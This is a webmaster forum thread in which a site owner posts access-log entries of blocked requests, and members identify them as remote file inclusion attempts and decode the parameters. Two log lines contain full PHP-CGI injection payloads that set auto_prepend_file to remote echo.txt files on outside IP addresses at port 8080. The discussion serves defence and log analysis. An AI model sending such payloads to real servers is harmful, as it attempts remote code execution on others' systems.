1. Home
  2. Forums Index
  3. General SEO Issues / Crawler, Spider, and User Agent ID 6:29 pm May 4, 2026

Forum Moderators: open

Message Too Old, No Replies

GET Request

         

Ken_S

7:38 pm on Nov 16, 2012 (gmt 0)

10+ Year Member



The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

keyplyr

9:22 am on Nov 17, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?

iamzippy

9:40 am on Nov 17, 2012 (gmt 0)

10+ Year Member



It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.

lucy24

10:17 am on Nov 17, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::

Ken_S

12:03 pm on Nov 18, 2012 (gmt 0)

10+ Year Member



Thanks everyone, I've lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken

Ken_S

10:03 pm on Nov 25, 2012 (gmt 0)

10+ Year Member



Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. General SEO Issues / Crawler, Spider, and User Agent ID 6:29 pm May 4, 2026